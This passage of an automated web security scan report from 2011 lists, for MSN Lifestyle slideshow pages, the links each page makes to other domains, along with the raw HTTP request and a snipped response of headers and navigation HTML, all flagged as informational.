http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.glamour.com/?mbid=msn
http://www.glamour.com/beauty/2010/05/19-cute-celebrity-haircuts-to-consider?mbid=synd_msn
http://www.glamour.com/beauty/2010/11/10-beauty-tricks-that-make-guys-melt?mbid=synd_msn
http://www.glamour.com/fashion/2010/10/flirty-little-date-outfit-ideas?mbid=synd_msn
http://www.glamour.com/fashion/2010/11/35-flirty-party-shoes-under-100?mbid=synd_msn
http://www.glamour.com/weddings/2009/11/21-gorgeous-wedding-dresses-under-1000-dollars?mbid=synd_msn
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660781&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Feveryday-style%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D27433131%26gt1%3D32002&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27433131&gt1=32002 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=adb2e2ea89ab4a8d815a677882d968c7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8E2CDAEB0F1847DC803B6E235C9B1300; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 54239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660781&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Feveryday-style%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D27433131%26gt1%3D32002&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamour.com?mbid=msn"><img src="http://blstb.msn.com/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/beauty/2010/05/19-cute-celebrity-haircuts-to-consider?mbid=synd_msn ">19 Cute Haircuts to Consider </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/fashion/2010/10/flirty-little-date-outfit-ideas?mbid=synd_msn ">21 Date Night Outfit Ideas </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/fashion/2010/11/35-flirty-party-shoes-under-100?mbid=synd_msn ">35 Flirty Party Shoes Under $100 </a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/beauty/2010/11/10-beauty-tricks-that-make-guys-melt?mbid=synd_msn ">10 Beauty Tricks That Make Guys Melt </a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/weddings/2009/11/21-gorgeous-wedding-dresses-under-1000-dollars?mbid=synd_msn ">21 Gorgeous Wedding Dresses (From $100 to $1,000!) </a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27433131&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM"><img src="http://blstb.msn.com/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27433131&gt1=32002&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
/lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27433131&gt1=32002&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS23"><span>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.130. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowlucky.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&gt1=32002

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://cid-d59f9ae9550a758d.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://download.live.com/?sku=messenger
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSN_Style
http://twitter.com/share
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/?FORM=MSNS23
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.luckymag.com/?mbid=msn
http://www.luckymag.com/magazine/2010/11/tights-and-shoes?mbid=synd_msnlife
http://www.luckymag.com/shopping/2010/09/wk_shopping_flared_denim?mbid=synd_msnlife
http://www.luckymag.com/shopping/2010/10/fall_office_style?mbid=synd_msnlife
http://www.luckymag.com/shopping/2010/10/weekend_shopping_colorful_jackets?mbid=synd_msnlife
http://www.luckymag.com/style/2009/08/look_your_best_jeans?mbid=synd_msnlife
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660785&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Feveryday-style%2Fstaticslideshowlucky.aspx%3Fcp-documentid%3D26798708%26gt1%3D32002&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&gt1=32002 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=aa5ed938e6a84669b5a58a20f84cc38e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=98BA7EF077E84EAB87D5BF59DDBFC9AB; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 78302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660785&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Feveryday-style%2Fstaticslideshowlucky.aspx%3Fcp-documentid%3D26798708%26gt1%3D32002&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.luckymag.com?mbid=msn"><img src="http://blstb.msn.com/i/CB/774EFF0D4A1D7E7AC93E42D19ED72.jpg" width="90" height="30" alt="Lucky" />
...[SNIP]...
<li class="first"><a href="http://www.luckymag.com/magazine/2010/11/tights-and-shoes?mbid=synd_msnlife">Bright Tights and Fall Shoes</a>
...[SNIP]...
<li class=""><a href="http://www.luckymag.com/shopping/2010/10/fall_office_style?mbid=synd_msnlife">14 Fall Office Essentials</a>
...[SNIP]...
<li class=""><a href="http://www.luckymag.com/style/2009/08/look_your_best_jeans?mbid=synd_msnlife">How to Look Your Best in Jeans</a>
...[SNIP]...
<li class=""><a href="http://www.luckymag.com/shopping/2010/09/wk_shopping_flared_denim?mbid=synd_msnlife">This Week We're Loving Flared Jeans</a>
...[SNIP]...
<li class="last"><a href="http://www.luckymag.com/shopping/2010/10/weekend_shopping_colorful_jackets?mbid=synd_msnlife">16 Fantastically Bright Coats for Fall</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
="http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&gt1=32002&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx?cp-documentid=26798708&gt1=32002&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XzpCS2ReKooEyeksGLdqhWZ4WHMhuiBoV?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XBe1ij-I_Xp9urjg1PjjxFyC0Fk3UD3oR?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIrHp_KBuyLhzbrpD9hNuGhs03i8KaXB-?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xmjps9z-W_gWNDaDdBwi5YuQThkHwBb0Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X376QbVntnTagHUphYmAuPiZz6jJyhhBX?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d59f9ae9550a758d.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Parker Parker</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d59f9ae9550a758d.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://blufiles.storage.msn.com/y1mexjcbCHJ84vpi8EgvxzU4B1aLs_G0ekjBk8Rmos7EeSiI5B8B_FPp6oUEFMCItV8pE8NsVSS1hi9Wv68jGKtig" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XV_4jKo7zKzZqSg_kIHtsiJwoVqEmbnQC?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XQdtb550cykFL1WbW5hlIoFkSSiLj-bD1?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSyzWoEs3k-wXaVp3PxvT5ufrO8DhWAUr?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
